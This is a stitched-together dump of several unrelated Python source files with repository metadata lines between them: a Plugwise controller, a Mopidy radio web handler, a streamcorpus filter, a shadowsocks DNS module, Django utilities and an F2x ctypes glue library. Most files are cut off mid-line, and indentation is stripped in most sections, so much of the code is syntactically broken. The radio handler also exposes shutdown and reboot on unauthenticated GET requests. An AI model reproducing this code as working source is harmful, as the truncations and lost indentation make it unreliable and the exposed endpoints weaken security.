os.makedirs(perpath+yrfolder+actdir)
if not os.path.exists(perpath+yrfolder+logdir):
os.makedirs(perpath+yrfolder+logdir)
if not os.path.exists(tmppath+yrfolder+actdir):
os.makedirs(tmppath+yrfolder+actdir)
rsyncing = True
if tmppath == None or tmppath == "/":
tmppath = perpath
rsyncing = False
if rsyncing:
# Could be a recovery after a power failure
    # /tmp/pwact-* may have disappeared, while the persistent version exists
perfile = perpath + yrfolder + actdir + actpre + now.date().isoformat() + '*' + actpost
cmd = "rsync -aXuq " + perfile + " " + tmppath + yrfolder + actdir
subprocess.call(cmd, shell=True)
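# Editor's note: a minimal config/pw-hostconfig.json covering the keys read
# above (values are illustrative placeholders, not taken from the source):
# {
#     "tmp_path": "/tmp/pw",
#     "permanent_path": "/home/pi/pw-data",
#     "log_path": "/var/log/pw",
#     "serial": "/dev/ttyUSB0",
#     "log_format": "epoch"
# }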
class PWControl(object):
"""Main program class
"""
def __init__(self):
"""
...
"""
global port
global tmppath
global curpre
global curpost
self.device = Stick(port, timeout=1)
self.staticconfig_fn = 'config/pw-conf.json'
self.control_fn = 'config/pw-control.json'
#self.schedule_fn = 'config/pw-schedules.json'
self.last_schedule_ts = None
self.last_control_ts = None
self.circles = []
self.schedules = []
self.controls = []
self.controlsjson = dict()
self.save_controls = False
self.bymac = dict()
self.byname = dict()
self.schedulebyname = dict()
self.curfname = tmppath + curpre + curpost
self.curfile = open(self.curfname, 'w')
self.statuslogfname = tmppath+'pw-status.json'
self.statusfile = open(self.statuslogfname, 'w')
self.statusdumpfname = perpath+'pw-statusdump.json'
self.actfiles = dict()
self.logfnames = dict()
self.daylogfnames = dict()
self.lastlogfname = perpath+'pwlastlog.log'
#read the static configuration
sconf = json.load(open(self.staticconfig_fn))
i=0
for item in sconf['static']:
#remove tabs which survive dialect='trimmed'
for key in item:
if isinstance(item[key],str): item[key] = item[key].strip()
item['mac'] = item['mac'].upper()
if item['production'].strip().lower() in ['true', '1', 't', 'y', 'yes', 'on']:
item['production'] = True
            if 'reverse_pol' not in item:
item['reverse_pol'] = False
self.bymac[item.get('mac')]=i
self.byname[item.get('name')]=i
#exception handling timeouts done by circle object for init
self.circles.append(Circle(item['mac'], self.device, item))
self.set_interval_production(self.circles[-1])
i += 1
info("adding circle: %s" % (self.circles[-1].name,))
#retrieve last log addresses from persistent storage
with open(self.lastlogfname, 'a+') as f:
f.seek(0)
for line in f:
parts = line.split(',')
mac, logaddr = parts[0:2]
if len(parts) == 4:
idx = int(parts[2])
ts = int(parts[3])
else:
idx = 0
ts = 0
logaddr = int(logaddr)
debug("mac -%s- logaddr -%s- logaddr_idx -%s- logaddr_ts -%s-" % (mac, logaddr, idx, ts))
try:
self.circles[self.bymac[mac]].last_log = logaddr
self.circles[self.bymac[mac]].last_log_idx = idx
self.circles[self.bymac[mac]].last_log_ts = ts
except:
error("PWControl.__init__(): lastlog mac not found in circles")
self.schedulesstat = dict ((f, os.path.getmtime(f)) for f in glob.glob(schedules_path+'/*.json'))
self.schedules = self.read_schedules()
self.poll_configuration()
def get_relays(self):
"""
Update the relay state for circles with schedules enabled.
"""
for c in self.circles:
if c.online and c.schedule_state == 'on':
try:
c.get_info()
except (TimeoutException, SerialException, ValueError) as reason:
debug("Error in get_relays(): %s" % (reason,))
continue
#publish relay_state for schedule-operated circles.
#could also be done unconditionally every 15 minutes in main loop.
self.publish_circle_state(c.mac)
def get_status_json(self, mac):
try:
c = self.circles[self.bymac[mac]]
control = self.controls[self.controlsbymac[mac]]
except:
info("get_status_json: mac not found in circles or controls")
return ""
try:
status = c.get_status()
status["mac"] = status["mac"]
status["monitor"] = (control['monitor'].lower() == 'yes')
status["savelog"] = (control['savelog'].lower() == 'yes')
#json.encoder.FLOAT_REPR = lambda f: ("%.2f" % f)
#msg = json.dumps(status, default = jsondefault)
msg = json.dumps(status)
except (ValueError, TimeoutException, SerialException) as reason:
error("Error in get_status_json: %s" % (reason,))
msg = ""
return str(msg)
def log_status(self):
self.statusfile.seek(0)
self.statusfile.truncate(0)
self.statusfile.write('{"circles": [\n')
comma = False
for c in self.circles:
if comma:
self.statusfile.write(",\n")
paulburkinshaw/mopidy-radio-pi | mopidy_radio_pi/static/MyHandler.py | Python | apache-2.0 | 11,919 | 0.043544
import SimpleHTTPServer
import sqlite3 as lite
import sys
import urlparse
import datetime
import json
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
class TrackListHandler(BaseHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200)
        self.send_header('Content-type', 'application/json; charset=utf8')
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
self.send_header("Access-Control-Allow-Headers", "X-Requested-With")
self.send_header("Access-Control-Allow-Headers", "Authorization")
def do_GET(self):
parsedParameters = urlparse.urlparse(self.path)
queryParsed = urlparse.parse_qs(parsedParameters.query)
if( 'type' in queryParsed ):
typeString = queryParsed['type']
if('addTrack' in typeString):
trackUriString = queryParsed['trackUri']
userString = queryParsed['user']
dedicateString = queryParsed['dedicate']
commentsString = queryParsed['comments']
self.addTrack(trackUriString, userString, dedicateString, commentsString)
elif('getTrack' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrack(trackUriString)
elif('getTrackRating' in typeString):
            trackUriString = queryParsed['trackUri']
self.getTrackRating(trackUriString)
elif('likeTrack' in typeString):
trackUriString = queryParsed['trackUri']
            trackNameString = queryParsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.likeTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('voteToSkipTrack' in typeString):
trackUriString = queryParsed['trackUri']
trackNameString = queryParsed['trackname']
trackArtistString = queryParsed['artist']
trackAlbumString = queryParsed['album']
self.voteToSkipTrack(trackUriString, trackNameString, trackArtistString, trackAlbumString)
elif('getTrackVotes' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotes(trackUriString)
elif('getTrackVotesAndRating' in typeString):
trackUriString = queryParsed['trackUri']
self.getTrackVotesAndRating(trackUriString)
elif('getTrendingTracks' in typeString):
self.getTrendingTracks()
elif('shutdownPi' in typeString):
self.shutdownPi()
elif('rebootPi' in typeString):
self.rebootPi()
else:
            SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)
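    # Editor's note: example requests dispatched by do_GET above (URI values
    # are illustrative placeholders):
    #   /?type=addTrack&trackUri=...&user=alice&dedicate=bob&comments=hi
    #   /?type=likeTrack&trackUri=...&trackname=...&artist=...&album=...
    #   /?type=getTrackVotes&trackUri=...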
def getTrack(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
con.text_factory = str
with con:
cur = con.cursor()
cur.execute("SELECT TrackUri, ChosenBy, DedicatedTo, Comments FROM Tracklist WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
#returnedTrackUri, returnedChosenBy, returnedComments = cur.fetchone()
print row[0], row[1], row[2], row[3]
self.wfile.write('{0}({1})'.format('jsonpGetTrackCallback', {'userString':row[1], 'dedicatedToString':row[2], 'commentString':row[3]}))
self.wfile.close()
def addTrack(self, trackUri, user, dedicate, comments):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("insert into Tracklist (TrackUri, ChosenBy, DedicatedTo, Comments, DateAdded) values (?, ?, ?, ?, date('now'))",(trackUri[0], user[0], dedicate[0], comments[0]))
self.wfile.write('{0}({1})'.format('jsonpAddTrackCallback', {'trackUriString':trackUri[0], 'userString':user[0], 'dedicatedToString':dedicate[0],'commentString':comments[0]}))
self.wfile.close()
def likeTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("Select count(*) from UpVote where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
if row[0] < 1:
cur.execute("insert into UpVote (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'true'}))
self.wfile.close()
else:
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'false', 'failedLikeReason':'You may only like a track once'}))
self.wfile.close()
#cur = con.cursor()
#cur.execute("insert into UpVote (TrackUri, DateVoted) values (?, date('now'))",(trackUri[0],))
#self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0]}))
#self.wfile.close()
def voteToSkipTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
today = datetime.datetime.now()
todayStr = "%s-%s-%s" % (today.year, today.month, today.day)
cur = con.cursor()
cur.execute("Select count(*) from votetoskip where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
if row[0] < 1:
cur.execute("insert into VoteToSkip (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'true'}))
self.wfile.close()
else:
                    self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'false', 'failedVoteReason':"Sorry you have exceeded your daily skipping quota for this track, but don't worry, if the song is that bad I'm sure someone else will click the button"}))
self.wfile.close()
def getTrackVotes(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM VoteToSkip WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
row = cur.fetchone()
print row[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackVotesCallbac
streamcorpus/streamcorpus-filter | py/src/streamcorpus_filter/_filter.py | Python | mit | 8,706 | 0.005628
'''python example of filtering through strings from a
streamcorpus.StreamItem to find names from a FilterName
'''
from __future__ import absolute_import
import logging
import os
import sys
from cStringIO import StringIO
## import the thrift library
from thrift import Thrift
from thrift.transport.TTransport import TBufferedTransport
from thrift.protocol.TBinaryProtocol import TBinaryProtocol
## pure python TBinaryProtocol is slow, so attempt to replace it with
## faster implementation
from thrift.protocol.TBinaryProtocol import TBinaryProtocolAccelerated
fastbinary_import_failure = None
try:
from thrift.protocol import fastbinary
raise Exception() ## don't let this happen
## use faster C program to read/write
TBinaryProtocol = TBinaryProtocolAccelerated
except Exception, exc:
fastbinary_import_failure = exc
## fall back to pure python
## thrift message classes from core streamcorpus library
from streamcorpus import StreamItem, Rating, Label, Annotator, Offset, OffsetType, Target
## thrift message class from this package
from streamcorpus_filter.ttypes import FilterNames
logger = logging.getLogger(__name__)
class Filter(object):
def __init__(self):
self.filter_names = None
self._names = None
self.token_boundary_chars = set([' ', '\n', '\s', '\t', '\r'])
def load_filter_names(self, path_to_thrift_message):
'''reads a FilterNames message from a flat file
'''
if not os.path.exists(path_to_thrift_message):
raise Exception('path does not exist: %r' % path_to_thrift_message)
fh = open(path_to_thrift_message, 'rb')
# This is a lame workaround to a bug in Thrift experienced
# during unit tests. Thrift cannot handle files in
# non-blocking mode that could return from .read() with less
# than the asked for data. read(-1) seems to force reading all
# the data, and once we have it all in memory it is safe for
# Thrift to read it.
raw = fh.read(-1)
logger.debug('read %s bytes of %r', len(raw), path_to_thrift_message)
fh = StringIO(raw)
i_transport = TBufferedTransport(fh)
i_protocol = TBinaryProtocol(i_transport)
self.filter_names = FilterNames()
self.filter_names.read(i_protocol)
## not actually required in CPython
fh.close()
def save_filter_names(self, path_to_thrift_message=None, file_obj=None):
'''writes a FilterNames message to a flat file
'''
if path_to_thrift_message:
if os.path.exists(path_to_thrift_message):
print('warning: overwriting: %r' % path_to_thrift_message)
o_transport = open(path_to_thrift_message, 'wb')
elif file_obj:
o_transport = file_obj
else:
raise Exception('must specify either path_to_thrift_message or file_obj')
o_protocol = TBinaryProtocol(o_transport)
self.filter_names.write(o_protocol)
o_transport.close()
def invert_filter_names(self):
'''constructs FilterNames.name_to_target_ids from
FilterNames.target_id_to_names
'''
if self.filter_names.name_to_target_ids:
print('warning: replacing existing FilterNames.name_to_target_ids')
self.filter_names.name_to_target_ids = dict()
for target_id in self.filter_names.target_id_to_names:
for name in self.filter_names.target_id_to_names[target_id]:
if name not in self.filter_names.name_to_target_ids:
self.filter_names.name_to_target_ids[name] = list()
                self.filter_names.name_to_target_ids[name].append(target_id)
print('%d names, %d target_ids' % (len(self.filter_names.name_to_target_ids),
len(self.filter_names.target_id_to_names)))
def compile_filters(self):
if not self.filter_names:
raise Exception('must first load FilterNames')
        ## for this simple example, all we do is convert the utf-8
## from FilterNames into unicode
self._names = dict()
for name in self.filter_names.name_to_target_ids:
self._names[name.decode('utf8')] = self.filter_names.name_to_target_ids[name]
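    # Editor's sketch of the intended call sequence (the file name is a
    # placeholder):
    #   f = Filter()
    #   f.load_filter_names('filter_names.thrift')
    #   f.invert_filter_names()   # build name -> target_ids if absent
    #   f.compile_filters()       # decode names to unicode
    #   f.apply_filters(stream_item)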
def register_token_boundary_char(self, char):
'''
add a unicode character to the set of symbols consider
equivalent to "token boundary"
'''
self.token_boundary_chars.add(char)
def advance_passed_boundary(self):
        '''
        Advance self.text_position past the current boundary, if
        possible, and report whether a token boundary was crossed.
        '''
start_text_position = self.text_position
while self.text_position < len(self.text) and self.text[self.text_position] in self.token_boundary_chars:
self.text_position += 1
if self.text_position == len(self.text):
return False
elif start_text_position != self.text_position:
## consumed some characters, so we must have reached a new token
return True
elif self.text_position == 0:
## special case for start of document
return True
else:
## have not passed a boundary
return False
def advance_to_boundary(self):
        '''
        Advance self.text_position to the next boundary or the end of self.text
        '''
while self.text_position < len(self.text) and self.text[self.text_position] not in self.token_boundary_chars:
self.text_position += 1
def apply_filters(self, stream_item, content_form='clean_html'):
'''iterates over the characters in stream_item.body.<content_form>
looking for strings that exact match keys in
self.filter_names.name_to_target_ids'''
if not self._names:
raise Exception('must first have a compiled set of filters')
annotator_id = 'streamcorpus-filter'
annotator = Annotator(annotator_id=annotator_id)
text = getattr(stream_item.body, content_form)
## pass text around by reference as a property on this class instance
self.text = text.decode('utf8')
## inefficient brute force loop for each name
for name in self._names:
name_tokens = name.split('\\W')
name_token_i = 0
self.text_position = 0
first_char_position = None
while name_tokens and self.text_position < len(self.text):
#print 'starting', self.text_position, name_token_i, name_tokens
reached_start_of_new_token = self.advance_passed_boundary()
if not reached_start_of_new_token:
self.advance_to_boundary()
continue
name_tok = name_tokens[name_token_i]
#print 'on a token', self.text_position, name_token_i, name_tok, self.text[self.text_position:self.text_position + len(name_tok)]
if name_tok != self.text[self.text_position : self.text_position + len(name_tok)]:
name_token_i = 0
first_char_position = None
self.text_position += 1
else:
name_token_i += 1
self.text_position += len(name_tok)
if first_char_position is None:
first_char_position = self.text_position
if name_token_i == len(name_tokens):
print 'found one!'
## reset state machine for next possible match in this document
name_token_i = 0
for target_id in self._names[name]:
target = Target(target_id=target_id)
rating = Rating(annotator=annotator, target=target)
label = Label( annotator=annotator, target=target)
label.offsets[OffsetType.CHARS] = Offset(
type=OffsetType.CHARS,
plus1s/shadowsocks-py-mu | shadowsocks/asyncdns.py | Python | apache-2.0 | 17,651 | 0.00017
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import os
import socket
import struct
import re
import logging
from shadowsocks import common, lru_cache, eventloop, shell
CACHE_SWEEP_INTERVAL = 30
VALID_HOSTNAME = re.compile(br"(?!-)[_A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
common.patch_socket()
# rfc1035
# format
# +---------------------+
# | Header |
# +---------------------+
# | Question | the question for the name server
# +---------------------+
# | Answer | RRs answering the question
# +---------------------+
# | Authority | RRs pointing toward an authority
# +---------------------+
# | Additional | RRs holding additional information
# +---------------------+
#
# header
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ID |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# |QR| Opcode |AA|TC|RD|RA| Z | RCODE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | QDCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ANCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | NSCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ARCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
QTYPE_ANY = 255
QTYPE_A = 1
QTYPE_AAAA = 28
QTYPE_CNAME = 5
QTYPE_NS = 2
QCLASS_IN = 1
def build_address(address):
address = address.strip(b'.')
labels = address.split(b'.')
results = []
for label in labels:
l = len(label)
if l > 63:
return None
results.append(common.chr(l))
results.append(label)
results.append(b'\0')
return b''.join(results)
def build_request(address, qtype):
request_id = os.urandom(2)
header = struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0)
addr = build_address(address)
qtype_qclass = struct.pack('!HH', qtype, QCLASS_IN)
return request_id + header + addr + qtype_qclass
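# Editor's sketch (not part of the original module): assemble a query for an
# A record and check its layout -- 2-byte random id + 10-byte fixed header +
# encoded QNAME + QTYPE/QCLASS.
def _example_build_query():
    req = build_request(b'example.com', QTYPE_A)
    qname = build_address(b'example.com')  # b'\x07example\x03com\x00'
    assert len(req) == 2 + 10 + len(qname) + 4
    return req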
def parse_ip(addrtype, data, length, offset):
if addrtype == QTYPE_A:
return socket.inet_ntop(socket.AF_INET, data[offset:offset + length])
elif addrtype == QTYPE_AAAA:
return socket.inet_ntop(socket.AF_INET6, data[offset:offset + length])
elif addrtype in [QTYPE_CNAME, QTYPE_NS]:
return parse_name(data, offset)[1]
else:
return data[offset:offset + length]
def parse_name(data, offset):
p = offset
labels = []
l = common.ord(data[p])
while l > 0:
if (l & (128 + 64)) == (128 + 64):
# pointer
pointer = struct.unpack('!H', data[p:p + 2])[0]
pointer &= 0x3FFF
r = parse_name(data, pointer)
labels.append(r[1])
p += 2
# pointer is the end
return p - offset, b'.'.join(labels)
else:
labels.append(data[p + 1:p + 1 + l])
p += 1 + l
l = common.ord(data[p])
return p - offset + 1, b'.'.join(labels)
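# Editor's note: parse_name implements rfc1035 name compression. A plain
# encoding such as b'\x07example\x03com\x00' at offset 0 parses to
# (13, b'example.com'); when the two high bits of a length byte are set,
# the remaining 14 bits point at an earlier occurrence of the name and only
# 2 bytes are consumed at the current position.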
# rfc1035
# record
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | |
# / /
# / NAME /
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TYPE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | CLASS |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TTL |
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | RDLENGTH |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
# / RDATA /
# / /
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
def parse_record(data, offset, question=False):
nlen, name = parse_name(data, offset)
if not question:
record_type, record_class, record_ttl, record_rdlength = struct.unpack(
'!HHiH', data[offset + nlen:offset + nlen + 10]
)
ip = parse_ip(record_type, data, record_rdlength, offset + nlen + 10)
return nlen + 10 + record_rdlength, \
(name, ip, record_type, record_class, record_ttl)
else:
record_type, record_class = struct.unpack(
'!HH', data[offset + nlen:offset + nlen + 4]
)
        return nlen + 4, (name, None, record_type, record_class, None, None)
def parse_header(data):
if len(data) >= 12:
header = struct.unpack('!HBBHHHH', data[:12])
res_id = header[0]
res_qr = header[1] & 128
res_tc = header[1] & 2
res_ra = header[2] & 128
res_rcode = header[2] & 15
# assert res_tc == 0
# assert res_rcode in [0, 3]
res_qdcount = header[3]
res_ancount = header[4]
res_nscount = header[5]
res_arcount = header[6]
return (res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount,
res_ancount, res_nscount, res_arcount)
return None
def parse_response(data):
try:
if len(data) >= 12:
header = parse_header(data)
if not header:
return None
res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount, \
res_ancount, res_nscount, res_arcount = header
qds = []
ans = []
offset = 12
for i in range(0, res_qdcount):
l, r = parse_record(data, offset, True)
offset += l
if r:
qds.append(r)
for i in range(0, res_ancount):
l, r = parse_record(data, offset)
offset += l
if r:
ans.append(r)
for i in range(0, res_nscount):
l, r = parse_record(data, offset)
offset += l
for i in range(0, res_arcount):
l, r = parse_record(data, offset)
offset += l
response = DNSResponse()
if qds:
response.hostname = qds[0][0]
for an in qds:
response.questions.append((an[1], an[2], an[3]))
for an in ans:
response.answers.append((an[1], an[2], an[3]))
return response
except Exception as e:
shell.print_exception(e)
return None
def is_valid_hostname(hostname):
if len(hostname) > 255:
return False
if hostname[-1] == b'.':
hostname = hostname[:-1]
return all(VALID_HOSTNAME.match(x) for x in hostname.split(b'.'))
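# Editor's note (illustrative): is_valid_hostname(b'example.com') is True,
# while is_valid_hostname(b'-bad-.com') is False because a label may not
# start or end with '-' (see the lookarounds in VALID_HOSTNAME).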
class DNSResponse(object):
def __init__(self):
self.hostname = None
self.questions = [] # each: (addr, type, class)
self.answers = [] # each: (addr, type, class)
def __str__(self):
return '%s: %s' % (self.hostname, str(self.answers))
STATUS_FIRST = 0
STATUS_SECOND = 1
class DNSResolver(objec
thoas/django-sequere | sequere/contrib/timeline/signals.py | Python | mit | 279 | 0
from django.dispatch import Signal
pre_save = Signal(providing_args=['instance', 'action', ])
post_save = Signal(providing_args=['instance', 'action', ])
pre_delete = Signal(providing_args=['instance', 'action', ])
post_delete = Signal(providing_args=['instance', 'action', ])
okfn/brand-manager | manager/apps/brand/notifications.py | Python | mit | 1,306 | 0
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
class EmailNotification:
msg_from = 'OKFN team <noreply@okfn.org>'
def __init__(self, msg_to, msg_from=None):
self.msg_to = msg_to
if msg_from:
self.msg_from = msg_from
    def send_mail(self, subject, message):
send_mail(subject, message, self.msg_from, [self.msg_to],
fail_silently=True)
def create_notification(self, brand_nm, bsin):
brand_url = reverse('brand', args=(bsin,))
subject = "%s added to the OKFN brand repository" % brand_nm
        message = """Dear contributor,
Your brand %s was added to the OKFN brand repository under BSIN %s.
More details at http://product.okfn.org%s .
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, bsin, brand_url)
self.send_mail(subject, message)
def delete_notification(self, brand_nm, comment):
subject = "%s rejected from OKFN brand repository" % brand_nm
message = """Dear contributor,
Your brand proposal for %s was rejected from the OKFN brand repository.
Moderator comment : %s
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, comment)
self.send_mail(subject, message)
Beeblio/django | tests/dispatch/tests/test_saferef.py | Python | bsd-3-clause | 1,886 | 0
import unittest
from django.dispatch.saferef import safeRef
from django.utils.six.moves import xrange
class Test1(object):
def x(self):
pass
def test2(obj):
pass
class Test2(object):
def __call__(self, obj):
pass
class SaferefTests(unittest.TestCase):
def setUp(self):
ts = []
ss = []
for x in xrange(5000):
t = Test1()
ts.append(t)
s = safeRef(t.x, self._closure)
ss.append(s)
ts.append(test2)
ss.append(safeRef(test2, self._closure))
for x in xrange(30):
t = Test2()
ts.append(t)
s = safeRef(t, self._closure)
ss.append(s)
self.ts = ts
        self.ss = ss
self.closureCount = 0
def tearDown(self):
del self.ts
del self.ss
def testIn(self):
"""Test the "in" operator for safe references (cmp)"""
for t in self.ts[:50]:
self.assertTrue(safeRef(t.x) in self.ss)
def testValid(self):
"""Test that the references are valid (return instance methods)"""
for s in self.ss:
self.assertTrue(s())
def testShortCircuit(self):
"""Test that creation short-circuits to reuse existing references"""
sd = {}
for s in self.ss:
sd[s] = 1
for t in self.ts:
if hasattr(t, 'x'):
self.assertTrue(safeRef(t.x) in sd)
else:
self.assertTrue(safeRef(t) in sd)
def testRepresentation(self):
"""Test that the reference object's representation works
XXX Doesn't currently check the results, just that no error
is raised
"""
repr(self.ss[-1])
def _closure(self, ref):
"""Dumb utility mechanism to increment deletion counter"""
self.closureCount += 1
DLR-SC/F2x | src/F2x/template/ctypes_noerr/lib/glue.py | Python | apache-2.0 | 17,616 | 0.0021
# Copyright 2018 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
F2x 'ctypes' template glue library.
This module contains helpers that are used by the code generated by the 'ctypes' library. It mainly deals with setting
correct C interfaces and converting values between FORTRAN and Python types. Arrays are handled by NumPy.
Usually there should be no need to access this module directly.
"""
import ctypes
import numpy
def constructor(cfunc):
"""
Make a C function a constructor.
The C interface is defined to accept no parameters and return a void pointer. It is also wrapped as a staticmethod
to allow usage in classes.
:param cfunc: The plain C function as imported from the C library using ctypes.
:return: A static method with appropriate C interface.
"""
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
return staticmethod(cfunc)
def destructor(cfunc):
"""
Make a C function a destructor.
Destructors accept pointers to void pointers as argument. They are also wrapped as a staticmethod for usage in
classes.
:param cfunc: The C function as imported by ctypes.
:return: The configured destructor.
"""
cfunc.argtypes = [ctypes.POINTER(ctypes.c_void_p)]
cfunc.restype = None
return staticmethod(cfunc)
def array_from_pointer(ctype, dims, ptr, strlen=None, dealloc=None):
"""
Helper that converts a pointer to a ctypes array.
The array will have flat layout.
:param ctype: Type of the contents of the array.
:param dims: List with the current sizes of the array.
:param ptr: Address of array memory.
:return: A ctypes array that points to the referred data.
"""
class ManagedArray(numpy.ndarray):
def __array_finalize__(self, obj):
if isinstance(obj, ManagedArray):
self.f2x_parent = obj
def __del__(self):
if hasattr(self, 'f2x_ptr'):
array_size = ctypes.c_int(len(self))
self.f2x_dealloc(ctypes.byref(array_size), ctypes.byref(self.f2x_ptr))
array_size = 1
for size in dims:
array_size *= size
array_type = ctype * array_size
c_array = array_type.from_address(ctypes.addressof(ptr.contents))
if strlen is None:
array = numpy.ctypeslib.as_array(c_array, dims)
else:
array = numpy.char.array(c_array, itemsize=strlen, copy=False, order='F')
if dealloc is not None:
array = array.view(ManagedArray)
array.f2x_dealloc = dealloc
array.f2x_ptr = ptr
return array
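# Editor's sketch (illustrative; `ptr` and `lib.dealloc` are hypothetical):
#   arr = array_from_pointer(ctypes.c_double, [2, 3], ptr, dealloc=lib.dealloc)
# wraps a FORTRAN-allocated 2x3 array without copying; the dealloc callback
# is invoked from ManagedArray.__del__ when the view is garbage-collected.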
class NullPointerError(BaseException):
"""
This exception is raised when Python wrapper code tries to access a C pointer that was not (yet) allocated (i.e. is
null). This exception is handled to automatically allocate dynamic arrays upon first assignment.
"""
pass
def _getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctypes.c_void_p
def _get(ptr):
cptr = cfunc(ptr)
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
def _get(ptr):
cptr = ctypes.c_char_p(0)
cfunc(ptr, ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctype
return cfunc
def _setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
